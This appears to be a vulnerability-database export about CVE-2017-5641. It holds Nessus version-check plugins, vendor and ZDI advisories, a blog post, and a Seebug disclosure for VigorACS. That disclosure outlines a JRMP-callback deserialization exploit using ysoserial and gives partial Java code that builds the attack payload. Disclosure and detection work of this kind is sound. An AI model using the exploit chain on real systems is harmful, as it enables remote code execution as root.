https://docs.vmware.com/en/VMware-vSphere/6.0/rn/vsphere-vcenter-server-60u3b-release-notes.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1bb48b81\");\n # https://docs.vmware.com/en/VMware-vSphere/6.5/rn/vsphere-vcenter-server-650c-release-notes.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?f0a01429\");\n script_set_attribute(attribute:\"see_also\", value:\"https://codewhitesec.blogspot.com/2017/04/amf.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to VMware vCenter Server Appliance 6.0 Update 3b / 6.5 Update\nc or later. Alternatively, apply the vendor-supplied workaround.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-5641\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/04/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/04/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/04/19\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:vmware:vcenter_server_appliance\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/VMware vCenter Server Appliance/Version\", \"Host/VMware vCenter Server Appliance/Build\");\n script_require_ports(\"Services/ssh\", 22);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nappname = 'VMware vCenter Server Appliance';\nversion = get_kb_item_or_exit(\"Host/\"+appname+\"/Version\");\nbuild = get_kb_item_or_exit(\"Host/\"+appname+\"/Build\");\nport = 0;\nfixversion_str = NULL;\n\nif (\n version !~ \"^6\\.0($|[^0-9])\" &&\n version !~ \"^6\\.5($|[^0-9])\"\n)\n audit(AUDIT_NOT_INST, appname + \" 6.0.x / 6.5.x\");\n\nif (version =~ \"^6\\.0($|[^0-9])\")\n{\n fixed_main_ver = \"6.0.0\";\n fixed_build = 5326079;\n\n if (int(build) < fixed_build)\n fixversion_str = fixed_main_ver + ' build-'+fixed_build;\n}\nelse if (version =~ \"^6\\.5($|[^0-9])\")\n{\n fixed_main_ver = \"6.5.0\";\n fixed_build = 5318112;\n\n if (int(build) < fixed_build)\n fixversion_str = fixed_main_ver + ' build-'+fixed_build;\n}\n\nif (isnull(fixversion_str))\n audit(AUDIT_INST_VER_NOT_VULN, appname, version, build);\n\nreport = report_items_str(\n report_items:make_array(\n \"Installed version\", version + ' build-' + build,\n \"Fixed version\", fixed_main_ver + ' build-' + fixed_build\n ),\n ordered_fields:make_list(\"Installed version\", \"Fixed version\")\n);\nsecurity_report_v4(port:port, severity:SECURITY_HOLE, extra:report);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-05T14:52:59", "description": "The version of VMware vCenter Server installed on the remote host is 6.0.x prior to 6.0u3b or 6.5.x prior to 6.5c. It is, therefore, affected by a flaw in FlexBlazeDS when processing AMF3 messages due to allowing the instantiation of arbitrary classes when deserializing objects. An unauthenticated, remote attacker can exploit this, by sending a specially crafted Java object, to execute arbitrary code.", "cvss3": {}, "published": "2017-04-19T00:00:00", "type": "nessus", "title": "VMware vCenter Server 6.0.x < 6.0u3b / 6.5.x < 6.5c BlazeDS AMF3 RCE (VMSA-2017-0007)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5641"], "modified": "2019-11-13T00:00:00", "cpe": ["cpe:/a:vmware:vcenter_server"], "id": "VMWARE_VCENTER_VMSA-2017-0007.NASL", "href": "https://www.tenable.com/plugins/nessus/99475", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(99475);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2019/11/13\");\n\n script_cve_id(\"CVE-2017-5641\");\n script_bugtraq_id(97383);\n script_xref(name:\"VMSA\", value:\"2017-0007\");\n script_xref(name:\"CERT\", value:\"307983\");\n\n script_name(english:\"VMware vCenter Server 6.0.x < 6.0u3b / 6.5.x < 6.5c BlazeDS AMF3 RCE (VMSA-2017-0007)\");\n script_summary(english:\"Checks the version of VMware vCenter.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A virtualization management application installed on the remote host\nis affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of VMware vCenter Server installed on the remote host is\n6.0.x prior to 6.0u3b or 6.5.x prior to 6.5c. It is, therefore,\naffected by a flaw in FlexBlazeDS when processing AMF3 messages due to\nallowing the instantiation of arbitrary classes when deserializing\nobjects. An unauthenticated, remote attacker can exploit this, by\nsending a specially crafted Java object, to execute arbitrary code.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.vmware.com/security/advisories/VMSA-2017-0007.html\");\n # https://docs.vmware.com/en/VMware-vSphere/6.0/rn/vsphere-vcenter-server-60u3b-release-notes.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1bb48b81\");\n # https://docs.vmware.com/en/VMware-vSphere/6.5/rn/vsphere-vcenter-server-650c-release-notes.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?f0a01429\");\n script_set_attribute(attribute:\"see_also\", value:\"https://codewhitesec.blogspot.com/2017/04/amf.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to VMware vCenter Server version 6.0u3b (6.0.0 build-5326177)\n/ 6.0u3b on Windows (6.0.0 build-5318198) / 6.5.0c (6.5.0\nbuild-5318112) or later. Alternatively, apply the vendor-supplied\nworkaround.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-5641\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/04/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/04/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/04/19\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:vmware:vcenter_server\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"find_service.nasl\", \"os_fingerprint.nasl\", \"vmware_vcenter_detect.nbin\");\n script_require_keys(\"Host/VMware/vCenter\", \"Host/VMware/version\", \"Host/VMware/release\");\n script_require_ports(\"Services/www\", 80, 443);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nport = get_kb_item_or_exit(\"Host/VMware/vCenter\");\nversion = get_kb_item_or_exit(\"Host/VMware/version\");\nrelease = get_kb_item_or_exit(\"Host/VMware/release\");\n\n# Extract and verify the build number\nbuild = ereg_replace(\n pattern:'^VMware vCenter Server [0-9\\\\.]+ build-([0-9]+)$',\n string:release, replace:\"\\1\"\n);\n\nif (empty_or_null(build) || build !~ '^[0-9]+$')\n audit(AUDIT_UNKNOWN_BUILD, \"VMware vCenter Server\");\n\nbuild = int(build);\nrelease = release - 'VMware vCenter Server ';\nfixversion = NULL;\nos = get_kb_item(\"Host/OS\");\n\n# Check version and build numbers\nif (version =~ \"^VMware vCenter 6\\.0($|[^0-9])\")\n{\n # If not paranoid, let's check to see if OS is populated\n if (report_paranoia < 2 && empty_or_null(os))\n exit(0, \"Can not determine version 6.0 fix build because Host/OS KB item is not set.\");\n\n # vCenter Server 6.0 Update 3b on Windows | 13 APR 2017 | ISO Build 5318198\n # Windows\n if (\"windows\" >< tolower(os))\n {\n fixbuild = 5318198;\n if (build < fixbuild) fixversion = '6.0.0 build-'+fixbuild;\n }\n\n # vCenter Server 6.0 Update 3b on vCenter Server Appliance Build 5318203\n # Standard\n else\n {\n fixbuild = 5318203;\n if (build < fixbuild) fixversion = '6.0.0 build-'+fixbuild;\n }\n}\nelse if (version =~ \"^VMware vCenter 6\\.5($|[^0-9])\")\n{\n # vCenter Server 6.5.0c | 13 APRIL 2017 | ISO Build 5318112\n # Standard\n fixbuild = 5318112;\n if (build < fixbuild) fixversion = '6.5.0 build-'+fixbuild;\n}\n\nif (isnull(fixversion))\n audit(AUDIT_LISTEN_NOT_VULN, 'VMware vCenter', port, release);\n\nreport = report_items_str(\n report_items:make_array(\n \"Installed version\", release,\n \"Fixed version\", fixversion\n ),\n ordered_fields:make_list(\"Installed version\", \"Fixed version\")\n);\nsecurity_report_v4(port:port, severity:SECURITY_HOLE, extra:report);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-05T14:54:15", "description": "According to its self-reported version number, the version of Atlassian JIRA hosted on the remote web server is 4.2.4 or later but prior to 6.3.0. It is, therefore, affected by multiple vulnerabilities in the JIRA Workflow Designer plugin :\n\n - A remote code execution vulnerability exists in the Action Message Format (AMF3) deserializer due to deriving class instances from java.io.Externalizable rather than the AMF3 specification's recommendation of flash.utils.IExternalizable. An unauthenticated, remote attacker with the ability to spoof or control an RMI server connection can exploit this to execute arbitrary code. (CVE-2017-5983)\n\n - An unspecified flaw exists in the XML Parser and Action Message Format (AMF3) deserializer components that allows an unauthenticated, remote attacker to cause a denial of service condition. (CVE-2017-5983)\n\n - An XML external entity (XXE) vulnerability exists in the XML Parser and Action Message Format (AMF3) deserializer components due to improper validation of XML documents embedded in AMF3 messages. An unauthenticated, remote attacker can exploit this to disclose sensitive information. (CVE-2017-5983)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2017-05-16T00:00:00", "type": "nessus", "title": "Atlassian JIRA 4.2.4 < 6.3.0 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5983"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:atlassian:jira"], "id": "JIRA_6_3.NASL", "href": "https://www.tenable.com/plugins/nessus/100220", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100220);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2017-5983\");\n script_bugtraq_id(97379);\n script_xref(name:\"CERT\", value:\"307983\");\n\n script_name(english:\"Atlassian JIRA 4.2.4 < 6.3.0 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server hosts a web application that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the version of\nAtlassian JIRA hosted on the remote web server is 4.2.4 or later but\nprior to 6.3.0. It is, therefore, affected by multiple vulnerabilities\nin the JIRA Workflow Designer plugin :\n\n - A remote code execution vulnerability exists in the\n Action Message Format (AMF3) deserializer due to\n deriving class instances from java.io.Externalizable\n rather than the AMF3 specification's recommendation of\n flash.utils.IExternalizable. An unauthenticated, remote\n attacker with the ability to spoof or control an RMI\n server connection can exploit this to execute arbitrary\n code. (CVE-2017-5983)\n\n - An unspecified flaw exists in the XML Parser and Action\n Message Format (AMF3) deserializer components that\n allows an unauthenticated, remote attacker to cause a\n denial of service condition. (CVE-2017-5983)\n\n - An XML external entity (XXE) vulnerability exists in the\n XML Parser and Action Message Format (AMF3) deserializer\n components due to improper validation of XML documents\n embedded in AMF3 messages. An unauthenticated, remote \n attacker can exploit this to disclose sensitive\n information. (CVE-2017-5983)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n # https://confluence.atlassian.com/jira/jira-security-advisory-2017-03-09-879243455.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?53ca783d\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Atlassian JIRA version 6.3.0 or later.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-5983\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/03/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/07/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:atlassian:jira\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"jira_detect.nasl\", \"atlassian_jira_win_installed.nbin\", \"atlassian_jira_nix_installed.nbin\");\n script_require_keys(\"installed_sw/Atlassian JIRA\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\n\napp_info = vcf::combined_get_app_info(app:'Atlassian JIRA');\n\nconstraints = [\n { 'min_version' : '4.2.4', 'fixed_version' : '6.3' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "zdi": [{"lastseen": "2023-12-03T20:40:21", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Nexus Dashboard Fabric Controller. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of the AMF protocol. Crafted data in an AMF protocol message can trigger the deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of the fmserver user.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-11T00:00:00", "type": "zdi", "title": "Cisco Nexus Dashboard Fabric Controller AMF Deserialization of Untrusted Data Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5641"], "modified": "2022-03-11T00:00:00", "id": "ZDI-22-506", "href": "https://www.zerodayinitiative.com/advisories/ZDI-22-506/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-03T20:40:22", "description": "This vulnerability allows local attackers to escalate privileges on affected installations of Cisco Nexus Dashboard Fabric Controller. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the configuration of a user permission. A crafted tcpdump command can trigger execution of a privileged operation. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of root.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-11T00:00:00", "type": "zdi", "title": "Cisco Nexus Dashboard Fabric Controller Improper Privilege Management Privilege Escalation Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5641"], "modified": "2022-03-11T00:00:00", "id": "ZDI-22-507", "href": "https://www.zerodayinitiative.com/advisories/ZDI-22-507/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "vmware": [{"lastseen": "2023-12-03T16:01:57", "description": "Remote code execution vulnerability via BlazeDS\n\nVMware vCenter Server contains a remote code execution vulnerability due to the use of BlazeDS to process AMF3 messages. This issue may be exploited to execute arbitrary code when deserializing an untrusted Java object.\n\nNote: The issue is present in the Customer Experience Improvement Program (CEIP) opt-in UI. If a customer has opted out of CEIP, the vulnerability is still present. Also, opting out will not remove the vulnerability.\n\nThe table below lists the versions of vCenter Server that have a fix for the issue. It also lists the VMware Knowledge Base articles that document a workaround that removes the vulnerability.\n\nVMware would like to thank Markus Wulftange of Code White GmbH for reporting this issue to us.\n\nThe Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the identifier CVE-2017-5641 to this issue. Column 5 of the following table lists the action required to remediate the vulnerability in each release, if a solution is available.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-04-13T00:00:00", "type": "vmware", "title": "VMware vCenter Server updates resolve a remote code execution vulnerability via BlazeDS", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5641"], "modified": "2017-04-13T00:00:00", "id": "VMSA-2017-0007", "href": "https://www.vmware.com/security/advisories/VMSA-2017-0007.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "avleonov": [{"lastseen": "2017-06-19T23:16:03", "description": "The question is: do we really need an employee in organization that deals with vulnerabilities in infrastructure on a full-time basis? Since this is similar to what I do for living, I would naturally say that yes, it is necessary. But as person, who makes security automation, I can say that there are some options. ![\ud83d\ude0a](https://s.w.org/images/core/emoji/2.3/72x72/1f60a.png)\n\n![Vulners Subscriptions](https://avleonov.com/wp-content/uploads/2017/04/Vulners_Subscriptions.png)\n\n### What can and can't Vulnerability Assessment (VA) specialist do?\n\nVA specialist makes recommendations to remove vulnerabilities from your infrastructure using some tools: vulnerability scanners, vulnerability feeds, different news sources. In case of network vulnerabilities, he will most often tell your IT administrators: \"Do we use A software with version BBB? As I see some security bulletin says that there is a critical vulnerability in it\". That's it.\n\nVA specialist by himself usually don't patch the hosts. Moreover, sometimes he can't detect the vulnerability, even he has an expansive vulnerability scanner, because some vulnerabilities can only be detected locally during authenticated scanning, and this IS specialist may not have permissions to do it.\n\nLet's look at [VMware vCenter Server vulnerability CVE-2017-5641](<https://vulners.com/vmware/VMSA-2017-0007>) (published 2017-04-13):\n\n> VMware vCenter Server contains a remote code execution vulnerability due to the use of BlazeDS to process AMF3 messages. This issue may be exploited to execute arbitrary code when deserializing an untrusted Java object.\n\nHow does it look from the VA side?\n\n 1. The scanner vendor creates a vulnerability detection plugin (6 days later).![VMware vCenter Server vulnerability](https://avleonov.com/wp-content/uploads/2017/04/VMware_vCenter_vulnerability.png)\n 2. VA specialist during regular scanning process (once a week? once a month?) finds out - wherever we have vulnerable VMware vCenter Server and creates a ticket for IT department.\n\nWith the same success IT administrator can simply [subscribe](<https://vulners.com/subscriptions>) to [VMware vulnerabilities](<https://vulners.com/search?query=type:vmware>) by himself and get information that it's time to patch it before the VM vendor will even create a detection plugin. Much faster and more reliable!\n\n![VMware search request](https://avleonov.com/wp-content/uploads/2017/04/VMware_request.png)\n\n### If there is no difference, why pay more?\n\nIn my opinion, for an SMB organization that don't have an information security role, or have only one IT security specialist who in charge of everything, highly customizable vulnerability feed may give your IT guys necessary information what we need to patch. And is much more cost effective solution than a full-time Vulnerability Assessment specialist.\n\nOK. Vulnerability feed will not tell us if we have vulnerable software installed in our environment. But VA specialist with expensive Vulnerability Scanner in many cases won't be able to tell you about it either without help of IT. Why pay more?\n\nSo, how we can live without VA specialist and traditional vulnerability scanners, but with vulnerability databases and subscriptions. I see this stages of process improvement:\n\n![Vulnerability subscriptions pyramid](https://avleonov.com/wp-content/uploads/2017/04/subscription_pyramid.png)\n\n 1. **Manual vulnerability tracking.** On the first stage We search for information and patch, only when all IS sites start to write about the vulnerability.\n 2. **Subscriptions to all vulnerabilities.** On this stage we start to monitoring the common vulnerability flow [by subscribing to Valners feed](<https://vulners.com/subscriptions>) or other service. We start to understand that there are a lot of vulnerabilities and it's not entirely clear what we should monitor.\n 3. **Subscriptions to vulnerabilities of the software we use.** We start to make queries for the software we use. We understand that it is difficult to maintain this list of software up-to-date and we come to necessity to collect it automatically, for example, using agents or integrating with IT monitoring tools.\n 4. **Automated applicability verification.** Knowing the names and versions of software we use, we can validate the vulnerability and greatly minimize the list of what we actually need to patch.\n\nBasically, you can stay for a long on any stage. But going to the next stage increases the efficiency of the process. False-positives are also not so scary. It is better to upgrade without a particular reason than to miss critical and exploitable vulnerability.\n\n![](http://feeds.feedburner.com/~r/avleonov/~4/siNTXDaD-6w)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-04-26T18:25:25", "type": "avleonov", "title": "Vulnerability subscriptions in terms of business", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5641"], "modified": "2017-04-26T18:25:25", "id": "AVLEONOV:77E5BDCD31BFF42A59B6BE11B5F5598C", "href": "http://feedproxy.google.com/~r/avleonov/~3/siNTXDaD-6w/", "cvss": {"score": 0.0, "vector": "NONE"}}], "seebug": [{"lastseen": "2018-06-10T09:45:27", "description": "### Vulnerability Summary\r\nA vulnerability in Vigor ACS allows unauthenticated users to cause the product to execute arbitrary code.\r\n\r\nVigorACS 2 \u201cis a powerful centralized management software for Vigor Routers and VigorAPs, it is an integrated solution for configuring, monitoring, and maintenance of multiple Vigor devices from a single portal. VigorACS 2 is based on TR-069 standard, which is an application layer protocol that provides the secure communication between the server and CPEs, and allows Network Administrator to manage all the Vigor devices (CPEs) from anywhere on the Internet. VigorACS 2 Central Management is suitable for the enterprise customers with a large scale of DrayTek routers and APs, or the System Integrator who need to provide a real-time service for their customer\u2019s DrayTek devices.\u201d\r\n\r\n### Credit\r\nAn independent security researcher, Pedro Ribeiro, has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program.\r\n\r\n### Vendor Response\r\n\u201cWe\u2019ll release the new version 2.2.2 to resolve this problem and inform the user about the CVE ID and reporter.\r\nThe release note will be updated on Wednesday (Apr 4, 2018).\r\nKindly let me know if you have further question, thank you!\u201d\r\n\r\n### Vulnerability Details\r\nVigorACS is a Java application that runs on both Windows and Linux. It exposes a number of servlets / endpoints under /ACSServer, which are used for various functions of VigorACS, such as the management of routers and firewalls using the TR-069 protocol [2].\r\n\r\nOne of the endpoints exposed by VigorACS, at /ACSServer/messabroker/amf, is an Adobe/Apache Flex service that is reachable by the managed routers and firewalls. This advisory shows that VigorACS uses a Flex version is vulnerable to CVE-2017-5641 [3], a vulnerability related to unsafe Java deserialization for Flex AMF\r\n\r\n### Technical Details\r\nBy sending an HTTP POST request with random data to /ACSServer/messagebroker/amf, the server will respond with a 200 OK and binary data that includes:\r\n\r\n```\r\n ...Unsupported AMF version XXXXX...\r\n```\r\n\r\nWhile in the server logs, a stack trace will be produced that includes the following:\r\n\r\n```\r\nflex.messaging.io.amf.AmfMessageDeserializer.readMessage ...\r\nflex.messaging.endpoints.amf.SerializationFilter.invoke ...\r\n...\r\n```\r\n\r\nA quick Internet search revealed CVE-2017-5641 [3], which clearly states in its description:\r\n\u201cPrevious versions of Apache Flex BlazeDS (4.7.2 and earlier) did not restrict which types were allowed for AMF(X) object deserialization by default. During the deserialization process code is executed that for several known types has undesired side-effects. Other, unknown types may also exhibit such behaviors. One vector in the Java standard library exists that allows an attacker to trigger possibly further exploitable Java deserialization of untrusted data. Other known vectors in third party libraries can be used to trigger remote code execution.\u201d\r\n\r\nFurther reading in [4], [5] and [6] led to a proof of concept (Appendix A) that showed both on the server logs and in the HTTP responses that the deserialization could be exploited to achieve code execution.\r\nA fully working exploit has been released with this advisory that works in the following way:\r\na) sends an AMF binary payload to /ACSServer/messagebroker/amf as described in [5] to trigger a Java Remote Method Protocol (JRMP) call back to the attacker\r\nb) receives the JRMP connection with ysoserial\u2019s JRMP listener [7]\r\nc) configures ysoserial to respond with a CommonsCollections5 or CommonsCollections6 payload, as a vulnerable version of Apache Commons 3.1 is in the Java classpath of the server\r\nd) executes code as root / SYSTEM\r\n\r\nThe exploit has been tested against the Linux and Windows Vigor ACS 2.2.1, although it requires a ysoserial jar patched for multi argument handling (a separate branch in [7], or alternative a ysoserial patched with CommonsCollections5Chained or CommonsCollections6Chained \u2013 see [8]).\r\n\r\nAppendix A contains the Java code used to generate the AMF payload that will be sent in step a). This code is very similar to the one in [5], and it is highly recommended to read that advisory by Markus Wulftange of Code White for a better understanding of this vulnerability.\r\n\r\nAppendix A\r\n```\r\nimport flex.messaging.io.amf.MessageBody;\r\nimport flex.messaging.io.amf.ActionMessage;\r\nimport flex.messaging.io.SerializationContext;\r\nimport flex.messaging.io.amf.AmfMessageSerializer;\r\nimport java.io.*;\r\n\r\npublic class ACSFlex {\r\n public static void main(String[] args) {\r\n Object unicastRef = generateUnicastRef(args[0], Integer.parseInt(args[1]));\r\n // serialize object to AMF message\r\n try {\r\n byte[] amf = new byte[0];\r\n amf = serialize((unicastRef));\r\n DataOutputStream os = new DataOutputStream(new FileOutputStream(args[2]));\r\n os.write(amf);\r\n System.out.println(\"Done, payload written to \" + args[2]);\r\n } catch (IOException e) {\r\n e.printStackTrace();\r\n }\r\n }\r\n\r\n public static Object 